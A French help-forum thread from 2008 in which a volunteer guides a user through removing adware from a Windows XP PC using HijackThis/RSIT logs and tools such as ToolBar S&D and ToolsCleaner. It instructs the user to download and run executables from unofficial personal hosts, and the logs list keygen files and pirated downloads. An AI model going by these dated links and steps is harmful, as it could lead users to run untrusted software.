C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\SuperCopier2\SuperCopier2.exe
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\MI3AA1~1apimgr.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Java\jre1.6.0_03\bin\jucheck.exe
C:\Documents and Settings\ups\Bureau\RSIT.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files	rend micro\ups.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = 
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
R3 - URLSearchHook: (no name) - {E312764E-7706-43F1-8DAB-FCDD2B1E416D} - (no file)
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [Horloge Parlante ZMSoft] C:\ZMSoft\HParlant\HParlante.exe
O4 - HKLM\..\Run: [SearchSettings] C:\Program Files\Search Settings\SearchSettings.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Program Files\SuperCopier2\SuperCopier2.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\wcescomm.exe"
O4 - Startup: µTorrent.lnk = C:\Program Files\uTorrent\uTorrent.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Reduire avec Alice's Biscuit - C:\Program Files\kayenko\alice's biscuit\alice.htm
O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZCxdm873YYNL
O8 - Extra context menu item: &Télécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddLink.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Tout t&élécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddList.html
O8 - Extra context menu item: Télécharger avec &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Créer un favori mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: SmartShopper - Compare travel rates - {3CC3D8FE-F0E0-4dd1-A69A-8C56BCC7BEC0} - C:\Program Files\SmartShopper\Bin\2.5.0\SmrtShpr.dll
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32
wprovau.dll
O16 - DPF: CabBuilder - http://kiw.imgag.com/imgag/kiw/toolbar/download/InstallerControl.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - http://gfx2.hotmail.com/mail/w2/resources/MSNPUpld.cab
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe

Lyonnais92 · Answer

Re,


Télécharge Toolbar-S&D (Team IDN) sur ton Bureau :

https://77b4795d-a-62cb3a1a-s-sites.googlegroups.com/site/eric71mespages/ToolBarSD.exe?attachauth=ANoY7cqJWPphpudyTqv7TRo5RQ3nm_Sx8JluVMO59X5E9cyE3j3LqKlmStIqiDqJdIgMJLi7MXn2nKVajQfoWuVvZZ2wIx_vkqO4k4P0K9jh-ra9jaKPXdZcoaVF2UqJZNH8ubL_42uIwh6f35xJ2GJMuzddVj2Qth1DgZ839lxEIFGkgWz3TdfvNMy-YtxfA3gqBUrj4U4LFeAPiWr3ClmjIP0t_Xs5PQ%3D%3D&attredirects=2

    * Lance l'installation du programme en exécutant le fichier téléchargé.
    * Double-clique maintenant sur le raccourci de Toolbar-S&D.
    * Sélectionne la langue souhaitée en tapant la lettre de ton choix puis en validant avec la touche Entrée.
    * Choisis maintenant l'option 1 (Recherche). Patiente jusqu'à la fin de la recherche.
    * Poste le rapport généré. (C:\TB.txt)

ducashaa · Answer

Bjr Lyonnais,

voici le rapport TB.txt


   -----------\  ToolBar S&D 1.2.4   XP/Vista


   "C:\ToolBar SD" ( MAJ : 27-10-2008|09:25 )
   Option : [1] ( 10/11/2008| 8:40 )

   -----------\  Recherche de Fichiers / Dossiers ...

   C:\DOCUME~1\ups\APPLIC~1\Search Settings
   C:\DOCUME~1\ups\APPLIC~1\Search Settings\kb127
   C:\Program Files\Search Settings
   C:\Program Files\Search Settings\kb127
   C:\Program Files\Search Settings\SearchSettings.exe
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper\cs
   C:\Program Files\SmartShopper
   C:\Program Files\SmartShopper\Bin
   C:\Program Files\SmartShopper\cs
   C:\Program Files\SmartShopper\Uninst.exe
   C:\DOCUME~1\ALLUSE~1\MENUDM~1\PROGRA~1\SmartShopper
   C:\WINDOWS\iun6002.exe
   C:\Program Files\MSN Messengeriched20.dll

   -----------\  [..\Internet Explorer\Main]

   [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
   "Local Page"="C:\WINDOWS\system32\blank.htm"
   "Search Page"="https://www.google.com/?gws_rd=ssl"
   "Search Bar"="http://www.google.com/toolbar/ie8/sidebar.html"

   [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
   "Default_Page_URL"="https://www.msn.com/fr-fr/?ocid=iehp"
   "Default_Search_URL"="http://www.google.com/toolbar/ie8/sidebar.html"
   "Search Page"="https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF"
   "Start Page"="https://www.google.com/?gws_rd=ssl"


   --------------------\  Recherche d'autres infections

   --------------------\  Cracks & Keygens ..

   C:\DOCUME~1\ups\Favoris\ZCRACK  software crack download site  cracks serials keygens keys warez software application program download.url
   C:\DOCUME~1\ups\Mes documents\didi\winzip11_keygen-VIRILITY.zip
   C:\DOCUME~1\ups\Mes documents\didi\winzip[1].9.0.keygen-tsrh.zip



   1 - "C:\ToolBar SD\TB_1.txt" - 07/11/2008|10:41 - Option : [1]
   2 - "C:\ToolBar SD\TB_2.txt" - 10/11/2008| 8:43 - Option : [1]

   -----------\  Fin du rapport a  8:43:56,79



Merci

Lyonnais92 · Answer

Bonjour,

toujours les cracks !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


Relance Toolbar-S&D en double-cliquant sur le raccourci. Tape sur "2" puis valide en appuyant sur "Entrée".
! Ne ferme pas la fenêtre lors de la suppression !
Un rapport sera généré, poste son contenu ici.

ducashaa · Answer

RE,

Je viens de supprimer ces 3 fichiers:

C:\DOCUME~1\ups\Favoris\ZCRACK software crack download site cracks serials keygens keys warez software application program download.url
C:\DOCUME~1\ups\Mes documents\didi\winzip11_keygen-VIRILITY.zip
C:\DOCUME~1\ups\Mes documents\didi\winzip[1].9.0.keygen-tsrh.zip

ducashaa · Answer

Voilà:

 -----------\  ToolBar S&D 1.2.4   XP/Vista


   "C:\ToolBar SD" ( MAJ : 27-10-2008|09:25 )
   Option : [1] ( 10/11/2008| 9:12 )

   -----------\  Recherche de Fichiers / Dossiers ...

   C:\DOCUME~1\ups\APPLIC~1\Search Settings
   C:\DOCUME~1\ups\APPLIC~1\Search Settings\kb127
   C:\Program Files\Search Settings
   C:\Program Files\Search Settings\kb127
   C:\Program Files\Search Settings\SearchSettings.exe
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper\cs
   C:\Program Files\SmartShopper
   C:\Program Files\SmartShopper\Bin
   C:\Program Files\SmartShopper\cs
   C:\Program Files\SmartShopper\Uninst.exe
   C:\DOCUME~1\ALLUSE~1\MENUDM~1\PROGRA~1\SmartShopper
   C:\WINDOWS\iun6002.exe
   C:\Program Files\MSN Messengeriched20.dll

   -----------\  [..\Internet Explorer\Main]

   [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
   "Local Page"="C:\WINDOWS\system32\blank.htm"
   "Search Page"="https://www.google.com/?gws_rd=ssl"
   "Search Bar"="http://www.google.com/toolbar/ie8/sidebar.html"

   [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
   "Default_Page_URL"="https://www.msn.com/fr-fr/?ocid=iehp"
   "Default_Search_URL"="http://www.google.com/toolbar/ie8/sidebar.html"
   "Search Page"="https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF"
   "Start Page"="https://www.google.com/?gws_rd=ssl"


   --------------------\  Recherche d'autres infections


   Aucune autre infection trouvée  !


   1 - "C:\ToolBar SD\TB_1.txt" - 07/11/2008|10:41 - Option : [1]
   2 - "C:\ToolBar SD\TB_2.txt" - 10/11/2008| 8:43 - Option : [1]
   3 - "C:\ToolBar SD\TB_3.txt" - 10/11/2008| 9:14 - Option : [1]

   -----------\  Fin du rapport a  9:14:13,42

Lyonnais92 · Answer

Re,

OK pour les cracks.

Ca doit aller beaucoup mieux.

Remets un rapport RSIT.

Je regarderai ça ce soir.

ducashaa · Answer

Rapport RSIT:
log.txt

Logfile of random's system information tool 1.04 (written by random/random)
Run by ups at 2008-11-10 15:06:36
Microsoft Windows XP Professionnel Service Pack 2
System drive C: has 1 GB (14%) free of 10 GB
Total RAM: 254 MB (24% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:06, on 10/11/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\ZMSoft\HParlant\HParlante.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\SuperCopier2\SuperCopier2.exe
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\MI3AA1~1apimgr.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Java\jre1.6.0_03\bin\jucheck.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\ups\Bureau\RSIT.exe
C:\Program Files	rend micro\ups.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = 
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [Horloge Parlante ZMSoft] C:\ZMSoft\HParlant\HParlante.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Program Files\SuperCopier2\SuperCopier2.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\wcescomm.exe"
O4 - Startup: µTorrent.lnk = C:\Program Files\uTorrent\uTorrent.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Reduire avec Alice's Biscuit - C:\Program Files\kayenko\alice's biscuit\alice.htm
O8 - Extra context menu item: &Télécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddLink.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Tout t&élécharger avec NetTransport - C:\Program Files\Xi\NetTransport 2\NTAddList.html
O8 - Extra context menu item: Télécharger avec &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Créer un favori mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32
wprovau.dll
O16 - DPF: CabBuilder - http://kiw.imgag.com/imgag/kiw/toolbar/download/InstallerControl.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - http://gfx2.hotmail.com/mail/w2/resources/MSNPUpld.cab
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe

ducashaa · Answer

Bonjour Lyonnais92,

j'ai toujours pas de tes nouvelles sur l'état RSIT de ma machine; J'espère que c'est parce que c'est hors de danger maintenant. Fais moi signe pour que je puisse ranger ceci dans "RESOLU"

Merci beaucoup pour tout, et merci à Chiquitine29

@+

Lyonnais92 · Answer

Bonjour,

ceci était resté dans mes oubliettes.

On en termine :

* Télécharge ToolsCleaner par A.Rothstein & dj QUIOU sur ton Bureau.

http://pc-system.fr/
hxxp://a-rothstein.changelog.fr/TC/ToolsCleaner2.exe
hxxp://pagesperso-orange.fr/AceRothstein/ToolsCleaner2.exe

* Clique sur Recherche et laisse le scan se terminer.

* Clique, sur Suppression pour finaliser.

* Tu peux, si tu le souhaites, te servir des Options facultatives.

* Clique sur Quitter, pour que le rapport puisse se créer.

* Poste moi le rapport (TCleaner.txt) qui se trouve à la racine de ton disque dur( C:\).

Lyonnais92 · Answer

Bonsoir,

supprime Combofix et Toolscleaner sur ton Bureau et C:\Tcleaner.txt.

Ouvre ce lien :

http://service1.symantec.com/SUPPORT/INTER/tsgeninfointl.nsf/fr_docid/20020830101856924

dans un premier temps tu le suis pour désactiver la restauration système.

Tu fermes la fenêtre.

Dans un deuxième temps, tu le suis pour réactiver la restauration.

Ceci recréé automatiquement un point de restauration daté de l"heure de la réactivation.

Vide ta Corbeille et défragmente tes partitions.

ducashaa · Answer

Bjr,

c'est fait: 

Combofix et Toolscleaner supprimés du Bureau et C:\Tcleaner.txt.

désactiver la restauration  et réactiver la restauration système.

Corbeille vidée puis défragmente mes partitions. 


voici le rapport du C:\

Volume (C:)
    Taille du volume                           = 9,31 Go
    Taille de cluster                          = 4 Ko
    Espace utilisé                             = 8,54 Go
    Espace libre                               = 785 Mo
    Pourcentage d'espace libre                 = 8 %

Fragmentation du volume
    Fragmentation totale                       = 33 %
    Fragmentation de fichiers                  = 59 %
    Fragmentation de l'espace libre            = 8 %

Fragmentation de fichiers
    Total de fichiers                          = 32 233
    Taille moyenne de fichier                  = 434 Ko
    Total de fichiers fragmentés               = 470
    Total de fragments en trop                 = 23 036
    Nombre moyen de fragments par fichier      = 1,71

Fragmentation du fichier paginé
    Taille du fichier paginé                   = 500 Mo
    Total de fragments                         = 123

Fragmentation de dossier
    Total de dossiers                          = 3 076
    Dossiers fragmentés                        = 1
    Fragments de dossiers en trop              = 0

Fragmentation de la table de fichiers principale (MFT)
    Taille totale de la MFT                    = 62 Mo
    Nombre d'enregistrements dans la MFT       = 35 506
    Pourcentage d'utilisation de la MFT        = 55 %
    Total de fragments dans la MFT             = 4

--------------------------------------------------------------------------------
Fragments       Taille du fichierFichiers qui ne peuvent pas être défragmentés
95              3 Mo            \WINDOWS\$hf_mig$\KB956390\SP3GDR\mshtml.dll
99              6 Mo            \Program Files\Microsoft Office\OFFICE11\ACWZDAT.MDT
101             6 Mo            \Program Files\Fichiers communs\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITS
107             7 Mo            \Program Files\Fichiers communs\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.ITS
168             7 Mo            \Program Files\Alwil Software\Avast4\DATA\integ\avast.int
109             7 Mo            \Program Files\Fichiers communs\Microsoft Shared\TRANSLAT\ENGE\MSB1ENGE.ITS
110             7 Mo            \Program Files\Fichiers communs\Microsoft Shared\TRANSLAT\GEEN\MSB1GEEN.ITS
121             8 Mo            \Program Files\Fichiers communs\Microsoft Shared\TRANSLAT\FRAR\MSB1FRAR.ITS
130             8 Mo            \WINDOWS\SoftwareDistribution\Download\a124f301bc107cfa919de4d98c0ac25b\sp2gdr\shell32.dll
130             8 Mo            \WINDOWS\SoftwareDistribution\Download\749a2072c695f57087c10474c2640179\sp2gdr\shell32.dll
130             8 Mo            \WINDOWS\$hf_mig$\KB900725\SP2QFE\shell32.dll
130             8 Mo            \WINDOWS\$hf_mig$\KB928255\SP2QFE\shell32.dll
130             8 Mo            \WINDOWS\SoftwareDistribution\Download\db67336f580d1683d6ce8b8c35e99070\SP2QFE\shell32.dll
156             10 Mo           \WINDOWS\Installer\MSI24.tmp
157             10 Mo           \Program Files\Fichiers communs\Microsoft Shared\PROOF\MSGR3GE.LEX
265             17 Mo           \WINDOWS\repair\software
267             17 Mo           \WINDOWS\system32\config\software.sav
101             19 Mo           \WINDOWS\SoftwareDistribution\Download\44b6174a4a693136d02d4a7ecd7cbd54\i386\sp3.cab
464             53 Mo           \Documents and Settings\ups\Local Settings\Application Data\Google\GoogleEarth\dbCache.dat
104             70 Mo           \Documents and Settings\ups\Local Settings\Application Data\Mozilla\Firefox\Profiles\iskdykvl.default\urlclassifier3.sqlite
154             116 Mo          \Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1036-7B44-A90000000001}\Data1.cab
132             129 Mo          \WINDOWS\Installer\1a1b343.msp
318             349 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E09.VOSTFR.FV\Prison.Break.S04E09.VOSTFR.FV.avi
1,526           350 Mo          \Documents and Settings\ups\Mes documents\Downloads\prison.break.410.hdtv-lol.avi
366             351 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E11.VOSTFR.HDTV.XViD-bibi4455.avi
185             351 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E05.HDTV.VOSTFR-LBP.avi
127             351 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E06.VOSTFR.FV.avi
537             352 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E08.VOSTFR.HDTV.XViD-bibi4455.avi
798             354 Mo          \Documents and Settings\ups\Mes documents\Downloads\Prison.Break.S04E07.VOSTFR.FV.avi
8,965           497 Mo          \Downloads\Software\Far_Cry_Demo_jouable.exe

Lyonnais92 · Answer

Bonsoir,

parfait, on en a terminé.

Bon surf.

ducashaa · Answer

bonjour,

mille merci à toi

Lyonnais92 · Answer

Bonjour,

de rien pour l'aide.

The_Cars virus

40 réponses

Votre réponse

Discussions similaires

Newsletters